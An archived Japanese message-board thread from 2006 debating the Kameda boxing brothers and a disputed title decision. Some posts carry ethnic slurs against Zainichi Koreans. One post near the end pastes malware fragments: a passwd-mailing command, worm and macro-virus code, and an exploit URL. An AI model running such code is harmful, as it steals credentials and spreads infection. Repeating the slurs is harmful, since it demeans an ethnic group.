雑談掲示板過去ログ



過去ログです。新規投稿・返信は出来ません。

[トップページ] [返信] [タイトルリスト] [スレッド一覧] [内容表示] [使い方]
件ずつ ページ目 and or 検索

[次の1件>

[5417] 亀田3兄弟 kumada - 最新投稿 >128 2006/08/03(木)19:59
[5417-1] 亀田3兄弟 kumada 2006/03/09(木)16:53
   亀田3兄弟について語りましょう。
俺は調子に乗りすぎかなと思います。昨日の試合でも試合中に相手を挑発してたし、ラウンド終わる毎に相手にガン飛ばしたり頭突きするし。

[5417-2] 慶次 2006/03/09(木)16:59
   すごいのは分かるけど、正直ウザい。

[5417-3] おそらく 予想屋 2006/03/09(木)17:35
   ニートがあれこれ言える相手ではない。

[5417-4] かたまり 2006/03/09(木)17:48
   どうもこうも三男がラーメンマンじゃん

[5417-5] ん? 2006/03/09(木)18:49
   TBSに作られてる感はあるね

[5417-6] kumada 2006/03/09(木)18:53
   つーか、礼儀を知らないよね。

[5417-7] 素晴らしい 2006/03/09(木)21:40
   亀田三兄弟は凄い努力と重圧背負ってるじゃん。まだ10代だよ。なんもしてない人間が文句言えるの?あの眼で睨まれたら小便チビるくせに。

[5417-8] いいんじゃない? 2006/03/09(木)22:08
   ボクシングは命をかけてやるスポーツだからあれぐらい気合いが入ってると気持ち良いね!
生意気だの無礼だのって言ってる奴に限って喧嘩もしたことのないオタクくんだろ!

[5417-9] しかし 2006/03/09(木)22:49
   スポーツマンシップに則ってないわなwまぁ若いボクサーなんてみんなそうだがww見ていて恥ずかしいがなwwあいつらからボクシングを取ったら何も残らないんだよなwww

[5417-10] ケン 2006/03/09(木)23:09
   他の格闘技ではあれほどイタいキャラはいない。
ボクシングならではだね
一生好きになれんわ、キャラもボクシングも

[5417-11] はぁ? 2006/03/09(木)23:10
   別にボクサーなんだからボクシング取る必要が無いのだがWWW
考えが古いよおじさんWWW

[5417-12] 2006/03/09(木)23:16
   自分自身を追い込んでんじゃないかな?あれだけデカい態度とってたら負ける訳にいかないだろうし、そうならない為に死ぬ程努力してんだろうし。俺はすげぇと思うよ。事実、結果残してるしさ。まぁ、次男、別に歌う必要ねぇだろとは思ったが…。

[5417-13] kumada 2006/03/09(木)23:33
   敬語使えばまだいいのに

[5417-14] それじゃつまらん 2006/03/10(金)00:24
   世界を狙う10代のガキが敬語使って周りに媚びてたらつまらん。我を持って自分がNo1ってギラギラした眼を持って対戦相手をビビらせる気迫があったほうがいい。みんなに好かれなくてもいいし

[5417-15] かめた 2006/03/10(金)00:28
    『ガチ ンコ』のノリが感じられ、やらせ臭さがあるのが見ていられない。昨日のパフォーマンスも半分はTBSからの要請もあっただろうし、亀田家だけでなく、相手のボウチャンにも「試合の勝ち負けより興業として面白くやってくれ」くらいの遠回しな「圧力」はあったんじゃないかな?
 今時、真面目にボクシングだけ見せれば視聴率取れる程、魅力的なコンテンツでないだけに、こういったキャラ作りも必要悪としてTVに求められているのだろう。

[5417-16] 鬼柴田 2006/03/10(金)02:40
   圧力があったとしてもそれに従う兄弟ではない(てか反抗?)と思うのであれが素だと思います。

なんにしろ、人より上の立場にいると考えているから、敬語使ったりしたくないと考えているんじゃないでしょうか?

年上を敬うのではなく、いかに苦労、努力したかによって尊敬するかどうかというのではないでしょうか?

スポーツマンシップに則ると言っても、格闘技って厳密にスポーツとして考えていいものなのか・・・と言う疑問があります。
殺し合いではないものの、人殺しても合法ですし・・・

[5417-17] 2006/03/10(金)07:42
   亀田3兄弟はアレでいいと思う。今は人気あるからいいけど、人気なくなったら家族全員地獄を見ることになる。だから逆にキャラ作りとか大変なんだと思うよ。

[5417-18] Aim 2006/03/10(金)08:40
   礼儀を尽くさなければ、格闘技はただのケンカ。

[5417-19] ウザ ロン 2006/03/10(金)09:08
   ボクシング観に行って、なんで歌きかされなかん!?
オヤジもでしゃばりすぎ!
ウザ過ぎ!!

[5417-20] ますたつ 2006/03/10(金)09:56
   あいつらはマスゴミに踊らされてるだけのお上りさん。あんな茶番見なきゃいい。日本の恥だ。てかあいつら在日じゃない?

[5417-21] 予想屋 2006/03/10(金)10:03
   あーだこーだ言うわりには、みんな亀田の事詳しい。好きなんじゃん

[5417-22] ロベッシャータ 2006/03/10(金)11:06
   みなさん彼ら兄弟のボディブローに耐えられるのですか?ものすごく効くそうですよ。ホンモノですよ。

[5417-23] たぁ 2006/03/10(金)12:45
   実はたいして強くない。そのうちわかるさ。あんな親父からまともな子供はそだたんよ。

[5417-24] なんと 2006/03/10(金)12:51
   あの試合で反則攻撃も目立ったらしいじゃん?スポーツ新聞に書いてあった。弱い相手を選びテレビ局と結託し、反則使って勝つのかぁ。チンピラにはお似合いだな。

[5417-25] まぁ 2006/03/10(金)13:11
   大口叩いてる奴は実際亀田3兄弟を前にしてそんな事言えるのかね(´・ω・`)

[5417-26] あはは 2006/03/10(金)13:33
   18の懐かしいなぁ。確かにそう言ってたよw

[5417-27] ケン 2006/03/10(金)13:41
   25みたいな事言ってたら誰もどのジャンルについても話が出来なくなる
評論家は商売できんわな
ガキの典型例みたいな事言わないでね

[5417-28] 2006/03/10(金)14:08
   違うんじゃない?
根性も無いくせ批判するなって言う意味じゃないの?
俺は亀田兄弟支援派だから25の言いたいことがわかるが!

[5417-29] 2006/03/10(金)14:17
   と25が自演してます。さっきから25みたいなガキみたいな言い様は笑えるどころか亀田家なみに幼稚で情けない。

[5417-30] ますたつ 2006/03/10(金)14:24
   逆に本人の目の前で批判したほうがおもしろい。それでカッとなって殴られたらラッキーだよな。それで奴のボクサー人生も終わり。あとは転落人生のみ。
同じ型破りボクサーでも辰吉の方が遥かに好感もてる。てか比べたら辰吉に失礼だな。しかし関西人てああいう奴好きだよなぁ。木村一八の二の舞か?

[5417-31] 2006/03/10(金)14:43
   出来もしないことを。18歳のガキになぜそこまで言うのかが分からん。あんなタイプにイジメられた奴らの言い訳にしか聞こえない。日本人は尖ったものをスグに叩きたがる。

[5417-32] ん? 2006/03/10(金)14:46
   その口振りは在日の方?そこまで歪んだとらえ方は間違いないでしょ?

[5417-33] ん? 2006/03/10(金)14:47
   32は31に対してね

[5417-34] 中山 2006/03/10(金)15:12
   知性のかけらもないスポーツマンて格好悪いよね。
猿山のボス猿と一緒

[5417-35] 31です 2006/03/10(金)15:32
   32の人、正解です。おめでとう。いい感してるわ。人種差別だけど

[5417-36] ケン 2006/03/10(金)15:55
   このテの話題って必ず
「本人目の前にして言ってみろ」
「どうせ似たような奴に昔イジメられたんだろうな」
「競技経験も無い奴が偉そうな事言うな」

ガキの理屈の定番メニューが盛りだくさんですね

[5417-37] 2006/03/10(金)17:13
   在日は口だけ 迷惑だから半島に帰ってください

[5417-38] どうでもいいですよ 2006/03/10(金)21:14
   世界一を狙うガキの事をあれこれ言うカードゲームで大会優勝を狙うオタク達。

[5417-39] 。。 りょーた 2006/03/10(金)23:43
   奴らキッドと変わらん!どっちがパクリ?

[5417-40] 2006/03/11(土)01:11
   あの三兄弟も在日!

スポンサーはパチ ンコの●楽。

[5417-41] わら 2006/03/11(土)01:11
   外国人は日本をおとなしい人種と言いなめてるから、亀田みたいな奴が世界をとればちょっとは見方が変わるはず。ボクシングを見てる奴限定だが

[5417-42] はぁ〜 2006/03/11(土)01:16
   亀田が何なん?見てて熱くなれんわ。階級軽いしパンチも軽い。何でもアリの総合格闘技の方がおもろい。

[5417-43] ;;;;;;; レモン 2006/03/11(土)01:54
   亀田三兄弟より種田山頭火のほうが好きなんだけど・・・

[5417-44] すぽると 2006/03/12(日)00:34
   さっきチラっと画面に親子が出たけどありゃやっぱヤクザだな。

[5417-45] カメラ 2006/03/12(日)15:08
   亀田だけに頭がち〇こみたいで大好きです。

[5417-46] 儲かりマンナ 2006/03/12(日)20:28
   亀田の1試合のファィトマネーが1500万だと〜(^O^) ちなみに世界チャンピォンクラスでも1試合1000万が相場なのにね!  もはやすでに勝ち組ですな(T_T)/~

[5417-47] 2006/03/12(日)20:41
   長くは続かんよ。

頭悪そうだもん。

[5417-48] 予想屋 2006/03/12(日)20:49
   45
それは最後の手段

[5417-49] 2006/03/12(日)23:22
   ボクサーって頭悪そうな人多いけど、殴られたせいでなくてもともと悪いってのが亀田兄弟のおかげでわかった

[5417-50] 普通に 2006/03/13(月)09:39
   下品なので嫌い

[5417-51] 鶴田三兄弟 2006/03/13(月)11:58
   亀田基地外

[5417-52] 2006/03/14(火)12:43
   ケン○ッキーのCMで次男似のやつが出てると
思うのはおれだけ?

[5417-53] 禿 2006/03/14(火)17:42
   団子三兄弟?どいつが長男?

[5417-54] え? 2006/03/14(火)22:57
   串に刺さってないやつが長男。

[5417-55] こいつら、クソ餓鬼 パンダ 2006/05/10(水)18:09
   なんだかな〜TBSもやらせっぽくすると萎えるよな〜。
ズラのボクサーでも放しとけ。

[5417-56] d 2006/05/10(水)18:44
   三男だけ喋ったところを見たことが無いからちょっとはマシな奴だといいなー。長男と次男は畑山とかちゃんと礼儀を知ってるボクサーを見習ってほしいな

[5417-57] 何だかんだ言っても 2006/05/10(水)19:04
   勝ち組なんだよな〜!
どんなもんじゃ〜い!

[5417-58] まあ 2006/05/10(水)22:11
   目立たせるの必死だが
こうなると堕ちられないね。
また余計に必死になるわけだ。

[5417-59] 猫パンチ せいたろう 2006/05/10(水)22:17
   ミッキー○ークよりマシ

[5417-60] あるばちゃこふ 2006/05/13(土)01:13
   あいつら畑山や竹原、ガッツや輪島にもタメ口なんかな。確かテリーにはタメ口だった。

[5417-61] d 2006/05/13(土)02:04
   尊敬してない人には敬語は使わないらしいよ

[5417-62] かと 2006/05/13(土)03:21
   キライ

[5417-63] 2006/05/13(土)05:02
   世界タイトル前哨戦は弱い奴とやって勝たせておいて、世界タイトル戦の時は負けてもしょうがないと思わせる作戦だな
まあ要するに亀田は雑魚と言うわけだ

[5417-64] 2006/05/13(土)06:30
   かなり前に亀田兄が竹原にタメグチで喋ってたら竹原が怒り亀田を軽くこづき胸ぐら掴んだら亀田もマジギレして揉め事になりかけた事があるよね
それから亀田親父と竹原は仲が悪いのは有名な話
畑山も亀田キライみたいね

[5417-65] まさろー 2006/05/13(土)23:00
   頼むから山本キッドとやって欲しい!
お互い挑発しまくり

[5417-66] 2006/08/02(水)11:42
   今日、試合に負けてオムツ姿になればいいのに〜

[5417-67] わからん 2006/08/02(水)12:31
   在日との噂もあり、とても無礼者で日本の恥さらしで一般国民から嫌われているのが実情のはずだが平沢議員や森元首相までもが応援するなんて…

視聴者も負けるのを期待して見てるのに…

日本ボクシング史上初の国民から応援されない試合がいよいよ今日開催されます。
赤ちゃんに里芋が潰されてオムツをはかされるのを期待しましょう。

[5417-68] 2006/08/02(水)13:07
   自分から最初に挑発して、逆にやられたら怒るなんて・・しかも親父までが恥ずかしい家族だな

[5417-69] さかな 2006/08/02(水)13:08
   ↑おまえがボコられてオツムはいてなさい。

[5417-70] 2006/08/02(水)13:10
   ↑お前がボコばいいんじゃない?

[5417-71] 2006/08/02(水)13:12
   オツムははけないよ〜!69はオツムがいかれてます

[5417-72] さかな 2006/08/02(水)14:15
   ヘタレどもが↑オツムでひっかかるとわ〜。脳がたりないな。

[5417-73] 言い訳がましい在日 2006/08/02(水)16:16
   日本語勉強しなさい

[5417-74] さかな 2006/08/02(水)17:44
   ↑おまえがな

[5417-75] サンクスかかk 2006/08/02(水)18:28
   さかなはひじきでも食ってろ!

[5417-76] 2006/08/02(水)18:45
   キレたの?

[5417-77] l 2006/08/02(水)20:05
   いじめられっこかよ

[5417-78] イライラ 2006/08/02(水)20:44
   さっきからずーっとまもなく開始って言ってる。
どこがまもなくだ!!

[5417-79] 2006/08/02(水)20:54
   同感。亀田まけるな。日本国歌歌ってたやつへたくそ

[5417-80] げらげら 2006/08/02(水)21:02
   1ラウンドからいい感じですね。

いきなりダウンとられ、あの青ざめた顔!

[5417-81] l 2006/08/02(水)21:03
   亀田がまけたら少しは黙るかな?

[5417-82] げらげら 2006/08/02(水)21:06
   てかこんな奴が背中に日の丸背負うなよ。

日の丸が穢れる!

[5417-83] l 2006/08/02(水)21:09
   亀田がまけたら少しは黙るかな?

[5417-84] げらげら 2006/08/02(水)21:10
   こりゃ亀が落ちるの時間の問題ですな。
亀のパンチは殆ど当たらんが対戦相手のパンチは高確率で当たってる。

[5417-85] l 2006/08/02(水)21:12
   これ何ラウンド?

[5417-86]   亀田製菓 2006/08/02(水)21:17
   もう足元がおぼつかないな

[5417-87] 2006/08/02(水)21:21
   12Rまでいけばいい方だな。ちょっと勝ち目が見えん

[5417-88]   亀田製菓 2006/08/02(水)21:23
   あれ?形勢逆転?

[5417-89] 2006/08/02(水)21:44
   12R...相手遊んでるな...

[5417-90] 2006/08/02(水)21:46
   亀田一発狙いすぎだなw

[5417-91] タートル 2006/08/02(水)21:48
   ぇ何故w

[5417-92] え? 2006/08/02(水)21:48
   八百長?

[5417-93] 2006/08/02(水)21:49
   おめでとう

[5417-94] てか 2006/08/02(水)21:49
   八百長だろ

[5417-95] 2006/08/02(水)21:50
   ジャッジ買収か?

ありえねー

[5417-96] タートル 2006/08/02(水)21:50
   観客の盛り上がりが冷めてる件についてw

[5417-97] おいおい 2006/08/02(水)21:51
   なにこれ

[5417-98] 2006/08/02(水)21:51
   これはチョットひどいな、いやホントだめだろ…どう思うね?

[5417-99] ミヤム 2006/08/02(水)21:52
   八百長

[5417-100] おやじゅ 2006/08/02(水)21:52
   最近俺は耳と目が悪くなったようだ。
亀田が勝った・・・

[5417-101] 2006/08/02(水)21:52
   チョンのジャッジは買収だろ

[5417-102] 2006/08/02(水)21:54
   亀田自身に嘘は無いよ。どこかの白黒チームと一緒でしょ

[5417-103] ああそうか!! 2006/08/02(水)21:56
   この試合は、判定のみK-1使用ですね

[5417-104] まったく 2006/08/02(水)21:57
   実力はあるとおもうがこの結果はちょとね…

[5417-105] ちょん 2006/08/02(水)21:58
   ちょんの二ポイント差は可笑しい

[5417-106] げらげら 2006/08/02(水)22:00
   あっ!
あまりにもありえない判定結果を聞いて固まってた。


鬼塚の時と比べ物にならんくらい酷い判定結果だな。
日本のボクシングは終わったな。これでだれもがボクシングに興味無くすわ。

[5417-107] 2006/08/02(水)22:01
   勝った亀が一番ぽかんとしていた。

[5417-108] これで 2006/08/02(水)22:02
   けーわんと同じ路線をとるな

[5417-109] イライラ 2006/08/02(水)22:05
   あれでよく勝ったね。
信じられん。

[5417-110] だね 2006/08/02(水)22:06
   具志堅に言われて、あんだけヤオじゃねーみたいに切れてたのに。
やっぱりヤオですか。
具志堅またなにかいわねーかな。金でチャンピオンベルト買ったとかさ。

しかし恥ずかしくねーのかな?

[5417-111] TBS おつ 2006/08/02(水)22:08
   テレビ局の力ってスゴイんだなぁ〜
と改めて思いました。レコ大動かしたんだから勝ってもらわないとね〜

[5417-112] かめ 2006/08/02(水)22:09
   ラウンドごとに差をつけてポイントを決めるルールだったので、もしかしたらと思ったが、やっぱりそうだった。
ありえない。再試合してあげないと相手が可哀相だよ。

[5417-113] 2006/08/02(水)22:10
   1Rでダウンとられて2ポイント差。11Rと12Rは一方的に打たれ続け2,3ポイント差ついたはず。ということは残り9Rのほとんどを取ったことになる。ホームとはいえ酷過ぎるな

[5417-114] i氏 2006/08/02(水)22:10
   八百長おめ!!!

[5417-115] さかな 2006/08/02(水)22:11
   強いな〜。最後の攻めなんか相手びびってたからな。チャンピオンにふさわしい勝ちだなぁ。

[5417-116] ランダエタ 2006/08/02(水)22:11
   茫然自失

[5417-117] 2006/08/02(水)22:12
   亀の有効打そんなにあったの?
経験者さん。教えてプリーズ

[5417-118] さかな 2006/08/02(水)22:23
   すべて努力だなぁ。

[5417-119] アッーーーー 2006/08/02(水)22:31
   有効打はあったけど
日本じゃなけりゃ、亀田じゃなけりゃ
判定では勝てない

元ボクシング部の俺の判定(ホームアドバンテージは考慮)

ランダエタ
IHHIIHHHHIII 114
GIIHHIIIIHHH 113
亀田興毅

[5417-120] 富士田 2006/08/02(水)22:42
   おれも共栄に入ればチャンピオンになれるな。
総額いくら包んだんだろ。

[5417-121] 2006/08/02(水)22:46
   最初のダウン分は取り戻せてないのは明らか。
あんだけスポンサーがつけば相手もジャッジも買収は楽だろうにww

相手はうまかったね。
ああゆうのが懐が深いってことかね?

[5417-122] a 2006/08/03(木)00:04
   「実力の10分の1も出してない」ホルホルホル
「視聴率の為にわざとダウンした」ウェーハッハ
何をわけわからん事を…
('A`)ダメだ、こいつ…

[5417-123] あるぅ 2006/08/03(木)00:12
   お歌広きで心の俳句

亀田はね
卑怯だけれども
僕ヒロキ!!!!!!!!!!!!!!!!
サンキューフィニィッシュ。いやいやー久しぶりの心の俳句は、ペンネームチン貸す食べた事亜留さんからのリクエストでビキニストリートです

お歌広きで心の短歌

亀田はね
気持ち悪いよ
なぜだろう…?
それはねそれはね…
僕ヒロキだよ!!!!!!!!!!!!!!

サンキューフィニィッシュ。いやいやー初めて短歌に挑戦してみたんですけどね…。ハイうまく行きませんね今回はペンネームどきどき血汚零斗さんからのリクエストで秋の夜長にパンティーペロペロおいしいな…。(残)

[5417-124] 2006/08/03(木)06:49
   朝からTBSに出演お疲れさま。
苦笑いしか出来ないよな。

[5417-125] さる 2006/08/03(木)08:21
   いくつか新聞を見たけど批判されまくりですね。しかも新聞社に抗議の電話が殺到したとまで書かれてます。

[5417-126] さかな 2006/08/03(木)10:02
   デルピエロ残留?

[5417-127] 2006/08/03(木)11:27
   猫パンチ!!

[5417-128] >124 つーか 2006/08/03(木)12:06
   みのもんたが、なにかズハッと言ってくれるのか
期待してたのだが…
休みかよ!

[5417-129] 涼宮ハルヒ 2006/08/03(木)12:55
   <body onload=window()>
[cat /etc/passwd | mail nobody@nonexistent.com]
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\MAIN.MHT!ttp://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
   5 6 7 ォ ュ b

[5417-130] >128 2006/08/03(木)19:59
   ズハッと!w


<前の1件]


[2024/05/02 22:32] 雑談掲示板過去ログ 管理人 ミヤムーウェブ
スレッド天国 ver.1.10